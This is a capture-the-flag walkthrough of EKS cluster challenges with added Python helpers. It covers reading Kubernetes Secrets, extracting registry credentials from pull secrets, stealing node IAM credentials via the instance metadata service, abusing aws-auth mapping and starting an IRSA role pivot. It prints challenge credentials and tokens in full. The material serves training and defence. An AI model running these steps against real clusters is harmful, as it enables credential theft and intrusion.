In Amazon EKS (Elastic Kubernetes Service), IAM (Identity and Access Management) is the AWS service that governs access to the cluster, its worker nodes and, through its integration with Kubernetes RBAC, the Kubernetes resources inside it. Two of its functions matter for everything that follows:

Controlling access to AWS resources: the cluster, every worker node and any workload that talks to AWS does so under an IAM role, and that role's policies decide which AWS APIs it may call.

Integration with Kubernetes RBAC: the aws-auth ConfigMap (or, on newer clusters, EKS access entries) maps an IAM user or role to a Kubernetes user name and a list of groups. RoleBindings and ClusterRoleBindings then tie those groups to Roles or ClusterRoles, which is where the fine-grained permissions over Pods, Secrets and ServiceAccounts actually live. The mapping alone grants nothing: an IAM principal that is mapped but unbound can authenticate and do nothing else, while a principal mapped to an over-bound group (the node role in challenge 4 below) inherits everything that group can do.

Amazon EKS itself is the managed Kubernetes service AWS offers. It is deeply integrated with the rest of AWS and exists to simplify deploying, operating and scaling Kubernetes clusters. The core of the relationship:

Managed control plane: AWS runs the Kubernetes control plane (API server, etcd, scheduler); the user does not maintain it.

Infrastructure: worker nodes run on EC2 instances or on AWS Fargate (serverless containers), whichever the user configures.

OIDC (OpenID Connect) is an authentication protocol built on OAuth 2.0 that verifies who a user is and returns basic identity claims (user name, e-mail and so on). It is widely used for single sign-on and identity management and is one of the core authentication mechanisms in cloud-native platforms such as Kubernetes and EKS. Every EKS cluster exposes an OIDC issuer; once that issuer is registered in IAM as an identity provider, a ServiceAccount token signed by the cluster can be exchanged at STS for IAM role credentials (IAM Roles for Service Accounts, IRSA). That exchange, combined with a trust policy that accepts more tokens than it should, is what challenge 5 turns on.
kubectl auth can-i --list shows that the current identity has both list and get on secrets.

kubectl get secrets                      # enumerate every Secret in the namespace
kubectl get secrets log-rotate -o json   # dump the object, .data included

The flag is one of the values under .data. It is only base64-encoded, so decoding it yields the flag.

The root cause is an over-permissive RBAC grant: the flag can be read straight out of a Kubernetes Secret.

A Kubernetes Secret is the resource type for storing and distributing sensitive material in a cluster: API keys, database credentials, certificates, passwords. On its own it is not a protection. The values in .data are merely base64-encoded, so anyone allowed to read the Secret decodes them trivially. Secrets also have a peculiarity worth remembering: not only get but also list and watch return the full objects, data included, so list or watch on secrets is as good as get on every one of them and, unlike get, needs no prior knowledge of the names. RBAC is not the only route either: with control of a node, the Secret material projected into Pods sits on the node filesystem under the kubelet's pod directories (/var/lib/kubelet/pods/<pod-uid>/volumes/kubernetes.io~secret/<volume>/), readable by root on the node.
Check permissions: the identity has get on secrets but not list, so the names of the Secrets cannot be enumerated.

Look at the Pods instead, and dump one Pod's full configuration:

kubectl get pod database-pod-2c9b3a4e -o yaml

This reveals the container image name and, under spec.imagePullSecrets, the name of the Secret that holds the credentials for pulling from the private registry. That is the Secret name we were missing. With get on secrets and a known name, the object can be read directly:

kubectl get secret registry-pull-secrets-780bab1d -o json

Base64-decoding .data[".dockerconfigjson"], and then the auth field inside it, yields the private registry's account and password:

eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo

Log in to the registry with crane (the container image tool from go-containerregistry):

root@wiz-eks-challenge:~# crane auth login index.docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
2025/04/18 08:47:19 logged in via /home/user/.docker/config.json

Pull the image with crane (the one the Pod above uses; it is the only private image name we know) and unpack the tarball:

crane pull eksclustergames/base_ext_image /tmp/image.tar
cd /tmp && tar xvf image.tar
I got an error here: there are too few threads and the box is too low-spec, so the pull would not complete.
After unpacking, the image's individual layers are visible. Unpacking each layer tarball in turn, one of them contains the flag:

wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}

The root cause is a mishandled image pull secret: the flag can be pulled out of the container registry.

In a real deployment a cluster has many nodes, and to keep Pods running each node pulls private images from a remote registry. To protect those images, and as a defence against supply-chain attacks, registries enforce authentication and authorisation; the credentials a Pod uses to reach the registry are then stored in a Secret of type kubernetes.io/dockerconfigjson and referenced from the Pod's imagePullSecrets. Anyone who can read that Secret (here: get on secrets plus a Pod spec that leaks the name) holds the registry credentials, and with them every private image and every build-time artefact baked into those images.
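The Secret-reading steps of challenges 1 and 2, as an added example in Python (my code, not part of the original write-up): decode the .data of a Secret, follow a Pod's spec.imagePullSecrets to the Secret it names, and extract the registry user name and password from a kubernetes.io/dockerconfigjson Secret. POD_JSON and the two Secret documents are constructed to match the shape of kubectl -o json output; the names reuse the challenge's, every credential value is a placeholder.

```python
"""Added example, not from the original write-up: the Secret-reading steps of
challenges 1 and 2 in code.  POD_JSON and the two Secret documents are
constructed to match the shape of `kubectl get ... -o json` output; names reuse
the challenge's, every credential value is a placeholder."""
import base64
import json

POD_JSON = json.dumps({
    "kind": "Pod",
    "metadata": {"name": "database-pod-2c9b3a4e", "namespace": "challenge2"},
    "spec": {
        "imagePullSecrets": [{"name": "registry-pull-secrets-780bab1d"}],
        "containers": [{"name": "db", "image": "eksclustergames/base_ext_image"}],
    },
})

# A kubernetes.io/dockerconfigjson Secret: .data holds base64 of a JSON document
# whose "auth" field is itself base64("user:password").
_DOCKERCFG = {"auths": {"https://index.docker.io/v1/": {
    "username": "example-user",
    "password": "dckr_pat_EXAMPLE",
    "auth": base64.b64encode(b"example-user:dckr_pat_EXAMPLE").decode(),
}}}
PULL_SECRET_JSON = json.dumps({
    "kind": "Secret",
    "type": "kubernetes.io/dockerconfigjson",
    "metadata": {"name": "registry-pull-secrets-780bab1d", "namespace": "challenge2"},
    "data": {".dockerconfigjson": base64.b64encode(json.dumps(_DOCKERCFG).encode()).decode()},
})
OPAQUE_SECRET_JSON = json.dumps({
    "kind": "Secret",
    "type": "Opaque",
    "metadata": {"name": "log-rotate", "namespace": "challenge1"},
    "data": {"flag": base64.b64encode(b"wiz_eks_challenge{example}").decode(),
             "blob": base64.b64encode(b"\x00\xff\x10").decode()},
})


def pull_secret_names(pod_json: str) -> list:
    """Secret names a Pod references in spec.imagePullSecrets; this is how the
    Pod spec leaks a Secret name to a caller who has get but not list."""
    spec = json.loads(pod_json).get("spec", {})
    return [ref["name"] for ref in spec.get("imagePullSecrets", [])]


def decode_secret(secret_json: str) -> dict:
    """Decode every value under .data.  Text comes back as str, anything else as
    bytes.  base64 is an encoding, not protection: read access is plaintext access."""
    out = {}
    for key, value in json.loads(secret_json).get("data", {}).items():
        raw = base64.b64decode(value)
        try:
            out[key] = raw.decode("utf-8")
        except UnicodeDecodeError:
            out[key] = raw
    return out


def registry_credentials(secret_json: str) -> dict:
    """registry -> (username, password) from a dockerconfigjson Secret.  The
    `auth` field is preferred because some tools omit username/password."""
    if json.loads(secret_json).get("type") != "kubernetes.io/dockerconfigjson":
        raise ValueError("not a kubernetes.io/dockerconfigjson Secret")
    cfg = json.loads(decode_secret(secret_json)[".dockerconfigjson"])
    creds = {}
    for registry, entry in cfg.get("auths", {}).items():
        if "auth" in entry:
            user, _, password = base64.b64decode(entry["auth"]).decode().partition(":")
        else:
            user, password = entry.get("username", ""), entry.get("password", "")
        creds[registry] = (user, password)
    return creds


if __name__ == "__main__":
    print(decode_secret(OPAQUE_SECRET_JSON))
    for name in pull_secret_names(POD_JSON):
        print(name, registry_credentials(PULL_SECRET_JSON))
```

Feed it real output with `kubectl get pod NAME -o json` and `kubectl get secret NAME -o json`; the only difference from the constructed documents is the extra metadata kubectl includes, which the functions ignore.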
Check permissions: get and list on pods.

Inspecting the Pods and their full configuration turns up nothing useful.

The hint points at the instance metadata service. This is AWS, so the relevant background is in section 7 (k8s: building and abusing malicious Pods).

curl 169.254.169.254/latest/meta-data

The listing includes an iam/ path. Following it to iam/security-credentials/ returns the name of the instance's IAM role, and requesting that name returns the role's temporary credentials. This works because the Pod can reach the node's metadata endpoint at all: IMDSv1 is enabled (no session token required) and nothing (a hop limit of 1, a network policy, or a metadata proxy) keeps Pod traffic away from 169.254.169.254. Note that a real IMDS response names the session token field Token and also carries Code, Type and LastUpdated; the challenge's endpoint is a simplified stand-in that returns SessionToken.
root@wiz-eks-challenge:~# curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole | jq .
{
"AccessKeyId": "ASIA2AVYNEVMYLCQCU7U",
"Expiration": "2025-04-18 10:10:02+00:00",
"SecretAccessKey": "vCftEz307ekr7u4yx+Tgky0rdpIp4O3RmzXGBZxO",
"SessionToken": "FwoGZXIvYXdzEPv//////////wEaDFfYDWOmi/QeCDns2yK3ASa8TJ6LhMrk8WGz/S6AZ1ckFIQhFsERrU2Zx90rWyUlCSyc7p6n2JvsmRyah6ZSqxCdRtDk1ugppgc/+tU278MXwYyftGxCf+AK5KXb0eDepX8aZJMgYRPNu4FfB1BsrJOhRzx3yiBKX3F6/HBa5n4KAl+vMXDyO+yRM90ivPdxqm0iN3MHJ4OsnosJKZPHNiIK/6rTM66oqhj5OjtyMljDW/82cAsodwPOfZ2eHiEHcWGI6BR+oSjqrYjABjItaStJIUc+dzR645Jktbc7YEE412EscQTfya2drECtGKg5O6ZFfW8qDuxXd83k"
}
Export the credentials as environment variables:
export AWS_ACCESS_KEY_ID="ASIA2AVYNEVMYLCQCU7U"
export AWS_SECRET_ACCESS_KEY="vCftEz307ekr7u4yx+Tgky0rdpIp4O3RmzXGBZxO"
export AWS_SESSION_TOKEN="FwoGZXIvYXdzEPv//////////wEaDFfYDWOmi/QeCDns2yK3ASa8TJ6LhMrk8WGz/S6AZ1ckFIQhFsERrU2Zx90rWyUlCSyc7p6n2JvsmRyah6ZSqxCdRtDk1ugppgc/+tU278MXwYyftGxCf+AK5KXb0eDepX8aZJMgYRPNu4FfB1BsrJOhRzx3yiBKX3F6/HBa5n4KAl+vMXDyO+yRM90ivPdxqm0iN3MHJ4OsnosJKZPHNiIK/6rTM66oqhj5OjtyMljDW/82cAsodwPOfZ2eHiEHcWGI6BR+oSjqrYjABjItaStJIUc+dzR645Jktbc7YEE412EscQTfya2drECtGKg5O6ZFfW8qDuxXd83k"
Verify that they work:

root@wiz-eks-challenge:~# aws sts get-caller-identity
{
  "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
  "Account": "688655246681",
  "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}

This is the IAM role attached to the worker node (the node instance role), so from inside the Pod we now hold the node's AWS identity.
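The metadata-service step above, as an added example in Python (my code, not from the write-up): it performs the IMDSv2 handshake (a PUT for a session token, then GETs carrying the X-aws-ec2-metadata-token header), falls back to the unauthenticated IMDSv1 request only if the PUT is refused, and turns the credential document into the three AWS_* variables the CLI reads. The HTTP transport is a parameter; fake_transport returns constructed responses with placeholder role name and credential values so the flow runs offline.

```python
"""Added example, not from the write-up: the metadata-service step as code.
Does the IMDSv2 handshake (PUT for a session token, then GET with the
X-aws-ec2-metadata-token header), falls back to plain IMDSv1 only if the PUT
is refused, and turns the credential document into the AWS_* variables the
CLI reads.  The transport is pluggable; fake_transport returns constructed
responses with placeholder values so the flow runs offline."""
import json
import urllib.error
import urllib.request
from datetime import datetime, timezone
from typing import Callable, Optional

IMDS = "http://169.254.169.254"
TOKEN_TTL_SECONDS = "21600"
# transport(method, url, headers) -> (http status, body)
Transport = Callable[[str, str, dict], tuple]


def urllib_transport(method: str, url: str, headers: dict) -> tuple:
    req = urllib.request.Request(url, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=2) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()


def node_role_credentials(transport: Transport = urllib_transport) -> dict:
    status, token = transport("PUT", f"{IMDS}/latest/api/token",
                              {"X-aws-ec2-metadata-token-ttl-seconds": TOKEN_TTL_SECONDS})
    # With IMDSv2 required, every later GET must carry this header; on an
    # IMDSv1-only host the PUT fails and the requests go out unauthenticated.
    headers = {"X-aws-ec2-metadata-token": token} if status == 200 else {}
    base = f"{IMDS}/latest/meta-data/iam/security-credentials/"
    status, role_name = transport("GET", base, headers)
    if status != 200:
        raise RuntimeError(f"no instance role exposed to this caller (HTTP {status})")
    role_name = role_name.strip()
    status, body = transport("GET", base + role_name, headers)
    if status != 200:
        raise RuntimeError(f"credential fetch failed (HTTP {status})")
    creds = json.loads(body)
    creds["RoleName"] = role_name
    return creds


def as_env(creds: dict) -> dict:
    """The three variables `aws sts get-caller-identity` needs.  Real IMDS names
    the session token "Token"; the challenge's endpoint returned "SessionToken"."""
    return {"AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
            "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
            "AWS_SESSION_TOKEN": creds.get("Token") or creds["SessionToken"]}


def seconds_left(creds: dict, now_iso: Optional[str] = None) -> float:
    """Time until the temporary credentials expire; accepts both the
    2025-04-18T10:10:02Z and 2025-04-18 10:10:02+00:00 spellings."""
    exp = datetime.fromisoformat(creds["Expiration"].replace("Z", "+00:00"))
    now = (datetime.fromisoformat(now_iso.replace("Z", "+00:00")) if now_iso
           else datetime.now(timezone.utc))
    return (exp - now).total_seconds()


def fake_transport(method: str, url: str, headers: dict) -> tuple:
    """Constructed IMDSv2 responses (placeholder values) for offline use."""
    if method == "PUT" and url.endswith("/latest/api/token"):
        return 200, "AQAAAexampletoken"
    if headers.get("X-aws-ec2-metadata-token") != "AQAAAexampletoken":
        return 401, ""  # v2 required: unauthenticated GETs are refused
    if url.endswith("/iam/security-credentials/"):
        return 200, "example-NodeInstanceRole\n"
    if url.endswith("/iam/security-credentials/example-NodeInstanceRole"):
        return 200, json.dumps({"AccessKeyId": "ASIAEXAMPLEKEYID", "SecretAccessKey": "examplesecret",
                                "Token": "examplesessiontoken", "Expiration": "2030-01-01T00:00:00Z"})
    return 404, ""


if __name__ == "__main__":
    for key, value in as_env(node_role_credentials()).items():
        print(f'export {key}="{value}"')
```

The defensive counterpart is on the node, not in the Pod: `aws ec2 modify-instance-metadata-options --http-tokens required --http-put-response-hop-limit 1` makes the PUT mandatory and, because a container in its own network namespace is one hop away from the instance, stops Pods from obtaining a session token in the first place.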
Get an ECR login password and use it to log crane in to the account's registry (the user name for ECR is always AWS; add --region us-west-1 if the CLI has no default region configured):

aws ecr get-login-password | crane auth login --username AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com
Again an error about too few threads.
Once logged in, parse the remote image and the flag falls out. crane config prints the image's configuration document straight from the registry without pulling any layers; its history array records the command behind every layer, the same information docker history shows for a local image:

crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01

The root cause is unrestricted access to the instance metadata service. Challenges 2 and 3 both exploit image layers. The layer structure is a core Docker concept: an image is built from a stack of read-only layers, each holding part of the filesystem plus metadata, which is what makes building, sharing and updating images efficient. Much like secrets leaking through commit history in a code repository, anything that enters an image during a build stays in it, and the build commands themselves (docker history, or the history array in the config that crane config prints) often reveal where a secret was injected.
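A scanner for the image configuration document that crane config returns, as an added example (my code, not the page's): it walks history[].created_by and config.Env for credential-shaped strings, which covers both build steps and the environment that docker history would summarise. IMAGE_CONFIG is a constructed config; the AKIA value is AWS's documented example key, and the pattern set is a starting point, not a complete secret detector.

```python
"""Added example, not the page's own code: scan the image configuration
document returned by `crane config` (the data `docker history` summarises) for
credential-shaped strings in build steps and environment.  IMAGE_CONFIG is
constructed; the AKIA value is AWS's documented example key."""
import json
import re

PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"),
    "docker_pat": re.compile(r"\bdckr_pat_[A-Za-z0-9_-]{20,}"),
    # KEY=value / KEY: value with a credential-like key; no leading \b so that
    # DB_PASSWORD and ARTIFACTORY_TOKEN are caught too
    "assignment": re.compile(r"(?i)(?:password|passwd|secret|token|api_key)\s*[=:]\s*\S+"),
    "flag": re.compile(r"\bwiz_eks_challenge\{[^}]*\}"),
}

IMAGE_CONFIG = json.dumps({
    "architecture": "amd64",
    "config": {"Env": ["PATH=/usr/bin", "ARTIFACTORY_TOKEN=example-token-value"]},
    "history": [
        {"created": "2025-01-01T00:00:00Z", "created_by": "/bin/sh -c #(nop) ADD file:abc in /"},
        {"created_by": "/bin/sh -c #(nop)  ARG DB_PASSWORD=hunter2", "empty_layer": True},
        {"created_by": "/bin/sh -c aws configure set aws_access_key_id AKIAIOSFODNN7EXAMPLE"},
        {"created_by": "/bin/sh -c echo 'wiz_eks_challenge{example_flag}' > /flag"},
    ],
})


def _matches(text: str):
    for kind, rx in PATTERNS.items():
        for m in rx.finditer(text):
            yield kind, m.group(0)


def scan_image_config(config_json: str) -> list:
    """One finding per hit: where it was found, the pattern kind and the match.
    ARG/ENV steps are empty layers, so they never show up by diffing layer
    tarballs; only the config/history reveals them."""
    cfg = json.loads(config_json)
    findings = []
    for i, step in enumerate(cfg.get("history", [])):
        for kind, match in _matches(step.get("created_by", "")):
            findings.append({"step": i, "kind": kind, "match": match,
                             "empty_layer": bool(step.get("empty_layer", False))})
    for env in cfg.get("config", {}).get("Env", []):
        for kind, match in _matches(env):
            findings.append({"step": "config.Env", "kind": kind, "match": match, "empty_layer": True})
    return findings


if __name__ == "__main__":
    for finding in scan_image_config(IMAGE_CONFIG):
        print(finding)
```

Pipe real input with `crane config IMAGE | python3 scan.py` after replacing IMAGE_CONFIG with sys.stdin.read(); the empty_layer flag is the useful detail, since those steps leave nothing in the layer tarballs that challenge 2 unpacked.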
Check permissions first: nothing at all.

So check who we are on the AWS side:

root@wiz-eks-challenge:~# aws sts get-caller-identity
{
  "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
  "Account": "688655246681",
  "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}

This returns an ARN. Its general form:

arn:partition:service:region:account-id:resource-type/resource-id

and for the ARN above:

arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282

partition: aws
service: sts
region: (empty; IAM and STS ARNs are global)
account-id: 688655246681
resource-type: assumed-role
resource-id: eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 (the role name, then the session name, which for an instance role is the instance ID)

The cluster name is not part of the ARN. The role name eks-challenge-cluster-nodegroup-NodeInstanceRole follows the usual <cluster>-nodegroup-... convention, which is what suggests the cluster is called eks-challenge-cluster.
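An ARN parser, as an added example (my code, not from the write-up): it handles the assumed-role form above as well as resources with no type prefix (S3 buckets) or with ':' inside the resource part (CloudWatch log groups). guess_cluster_name encodes the naming-convention heuristic the text relies on and is an assumption, since the ARN itself carries no cluster name.

```python
"""Added example, not from the write-up: split an ARN into its fields, and an
STS assumed-role ARN further into role name and session name.
guess_cluster_name is the naming-convention heuristic the text relies on
(an assumption): the ARN itself carries no cluster name."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Arn:
    partition: str
    service: str
    region: str      # empty for global services such as IAM and STS
    account: str
    resource: str    # "type/id", "type:id" or a bare id (S3 buckets)

    def _split(self):
        m = re.match(r"([^/:]+)[/:](.*)", self.resource, re.S)
        return (m.group(1), m.group(2)) if m else ("", self.resource)

    @property
    def resource_type(self) -> str:
        return self._split()[0]

    @property
    def resource_id(self) -> str:
        return self._split()[1]


def parse_arn(arn: str) -> Arn:
    parts = arn.split(":", 5)   # at most 5 splits: the resource may contain ':'
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not an ARN: {arn!r}")
    return Arn(*parts[1:])


def assumed_role(arn: Arn) -> Optional[tuple]:
    """(role name, session name) for arn:aws:sts::ACCT:assumed-role/ROLE/SESSION.
    For an EC2 instance role the session name is the instance ID."""
    if arn.service != "sts" or arn.resource_type != "assumed-role":
        return None
    role, _, session = arn.resource_id.partition("/")
    return role, session


def guess_cluster_name(role_name: str) -> Optional[str]:
    """Assumed convention: node roles named '<cluster>-nodegroup-...'."""
    m = re.match(r"(.+?)-nodegroup-", role_name)
    return m.group(1) if m else None


if __name__ == "__main__":
    a = parse_arn("arn:aws:sts::688655246681:assumed-role/"
                  "eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282")
    role, session = assumed_role(a)
    print(a, role, session, guess_cluster_name(role))
```

When the heuristic returns nothing, `aws eks list-clusters` is the reliable way to find the cluster name, provided the stolen role is allowed to call it.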
Request a Kubernetes token for that cluster with the node role's credentials:

root@wiz-eks-challenge:~# aws eks get-token --cluster-name eks-challenge-cluster
{
  "kind": "ExecCredential",
  "apiVersion": "client.authentication.k8s.io/v1beta1",
  "spec": {},
  "status": {
    "expirationTimestamp": "2025-04-18T12:05:08Z",
    "token": "k8s-aws-v1.<token elided>"
  }
}

The token is not a Kubernetes credential in its own right: it wraps a presigned STS GetCallerIdentity request. The API server's authenticator replays that request to learn which IAM principal is calling and then maps the principal through aws-auth. Because the node instance role is mapped there, node credentials are cluster credentials. Point kubectl at the token and see what it can do:

alias kubectl="kubectl --token=k8s-aws-v1.<token elided>"
root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]
It has get and list on secrets, so dump them in full:
root@wiz-eks-challenge:~# kubectl get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
  kind: Secret
  metadata:
    creationTimestamp: "2023-11-01T12:27:57Z"
    name: node-flag
    namespace: challenge4
    resourceVersion: "883574"
    uid: 26461a29-ec72-40e1-adc7-99128ce664f7
  type: Opaque
kind: List
metadata:
  resourceVersion: ""
wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}
The root cause is that the node's IAM role has too many permissions: through aws-auth it is mapped to a Kubernetes identity with far more RBAC rights than a node needs, so node credentials stolen via IMDS are enough to read Secrets.
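The token format behind aws eks get-token, as an added example (my code, not part of the original write-up). The format is aws-iam-authenticator's: the prefix k8s-aws-v1. followed by the unpadded base64url of a presigned STS GetCallerIdentity URL, with the cluster name bound in through the signed x-k8s-aws-id header that the authenticator sets when it replays the request. SAMPLE_URL is a constructed presigned URL whose credential and signature values are placeholders; sanity_checks reflects two things the authenticator verifies before replaying (x-k8s-aws-id among the signed headers, X-Amz-Expires of at most 60 seconds).

```python
"""Added example, not part of the original write-up: the token format behind
`aws eks get-token`.  It is aws-iam-authenticator's: "k8s-aws-v1." followed by
the unpadded base64url of a presigned STS GetCallerIdentity URL.  The API
server's authenticator replays the URL with x-k8s-aws-id set to the cluster
name and maps the returned ARN through aws-auth.  SAMPLE_URL is constructed;
credential and signature values in it are placeholders."""
import base64
from urllib.parse import parse_qs, urlparse

PREFIX = "k8s-aws-v1."

SAMPLE_URL = ("https://sts.us-west-1.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15"
              "&X-Amz-Algorithm=AWS4-HMAC-SHA256"
              "&X-Amz-Credential=ASIAEXAMPLEKEYID%2F20250418%2Fus-west-1%2Fsts%2Faws4_request"
              "&X-Amz-Date=20250418T120000Z&X-Amz-Expires=60"
              "&X-Amz-SignedHeaders=host%3Bx-k8s-aws-id"
              "&X-Amz-Security-Token=EXAMPLESESSIONTOKEN"
              "&X-Amz-Signature=" + "0" * 64)


def encode_token(presigned_url: str) -> str:
    return PREFIX + base64.urlsafe_b64encode(presigned_url.encode()).decode().rstrip("=")


def decode_token(token: str) -> dict:
    """Presigned URL host and parameters; raises if the token is not of this form."""
    if not token.startswith(PREFIX):
        raise ValueError("not a k8s-aws-v1 token")
    body = token[len(PREFIX):]
    url = base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)).decode()
    u = urlparse(url)
    params = {k: v[0] for k, v in parse_qs(u.query).items()}
    if u.scheme != "https" or not u.netloc.startswith("sts.") or params.get("Action") != "GetCallerIdentity":
        raise ValueError("payload is not a presigned STS GetCallerIdentity URL")
    return {
        "host": u.netloc,
        "params": params,
        "signed_headers": params.get("X-Amz-SignedHeaders", "").split(";"),
        "expires": int(params.get("X-Amz-Expires", "0")),
        "credential": params.get("X-Amz-Credential", ""),   # KEYID/date/region/sts/aws4_request
    }


def sanity_checks(decoded: dict) -> list:
    """What aws-iam-authenticator insists on before it will replay the URL."""
    problems = []
    if "x-k8s-aws-id" not in decoded["signed_headers"]:
        problems.append("x-k8s-aws-id is not a signed header: token is not bound to a cluster")
    if decoded["expires"] > 60:
        problems.append("X-Amz-Expires above 60 seconds is rejected")
    return problems


SAMPLE_TOKEN = encode_token(SAMPLE_URL)

if __name__ == "__main__":
    d = decode_token(SAMPLE_TOKEN)
    print(d["host"], d["credential"], sanity_checks(d))
```

Two practical consequences follow from the format. The token is only as secret as the presigned URL inside it, so it should be treated like the AWS credentials that signed it; and the access key ID in X-Amz-Credential (ASIA... for temporary credentials) identifies which role session minted it, which is what to look for in CloudTrail's GetCallerIdentity events when investigating an aws-auth abuse.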
Check permissions:
root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]
The listing shows get and list on secrets, yet listing them fails:

root@wiz-eks-challenge:~# kubectl get secrets
error: You must be logged in to the server (Unauthorized)

Note the wording. Unauthorized is an authentication failure (HTTP 401), unlike the Forbidden that RBAC returns, so the token kubectl presented was not accepted at all. A stale kubectl alias from the previous challenge, whose get-token credential has a short lifetime, is a common cause and worth ruling out with unalias kubectl before reading anything into the permission list. Attempts to list pods, nodes, serviceaccounts and other resources fail the same way.

What this identity can do is create a token for the ServiceAccount named debug-sa (resource serviceaccounts/token, resource name debug-sa, verb create). The ServiceAccounts in the namespace:
apiVersion: v1
items:
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    annotations:
      description: This is a dummy service account with empty policy attached
      eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
    creationTimestamp: "2023-10-31T20:07:37Z"
    name: debug-sa          # the one we can mint tokens for: kubectl create token debug-sa
    namespace: challenge5
    resourceVersion: "671929"
    uid: 6cb6024a-c4da-47a9-9050-59c8c7079904
- apiVersion: v1
  kind: ServiceAccount
  metadata:
    annotations:
      # the IAM role we want to assume
      eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
    creationTimestamp: "2023-10-31T20:07:34Z"
    name: s3access-sa
    namespace: challenge5
    resourceVersion: "671916"
    uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda
kind: List
metadata:
  resourceVersion: ""
Normally a token minted with kubectl create token cannot be used against AWS: its audience (the aud claim) is the Kubernetes API server, and STS rejects a web-identity token whose audience is not one registered on the IAM identity provider.

The bridge between the two is OIDC. AWS's OpenID Connect support lets an external identity provider (Google, an enterprise IdP, or here the EKS cluster's own issuer) be registered in IAM. Roles can then trust that provider, and a token it issues can be exchanged for AWS credentials with sts:AssumeRoleWithWebIdentity. On EKS this mechanism is IAM Roles for Service Accounts (IRSA). The eks.amazonaws.com/role-arn annotation on s3access-sa tells the EKS Pod identity webhook which role to inject into Pods that run as that ServiceAccount; it is not what STS checks. STS checks the role's trust policy, and a trust policy that conditions only on aud and not on sub trusts every ServiceAccount in the cluster.

So the plan is to use the cluster's OIDC issuer to obtain AWS credentials. First mint a token for debug-sa, the ServiceAccount we are allowed to create tokens for:

root@wiz-eks-challenge:~# kubectl create token debug-sa
